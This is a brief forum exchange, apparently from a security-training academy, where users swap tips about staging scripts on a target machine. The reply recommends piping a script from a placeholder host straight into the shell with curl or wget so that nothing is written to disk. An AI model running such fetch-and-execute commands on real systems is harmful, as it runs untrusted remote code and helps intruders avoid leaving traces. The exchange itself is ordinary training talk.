Official Academy Discussion

@Feror said:

For anyone who reads this: use mktemp -d to create a temporal directory and stop downloading your scripts on /home directory

There’s no need to even download the scripts to disk, you can simply curl http://ip:port/script.sh | sh (or wget -O - ... when curl isn’t available)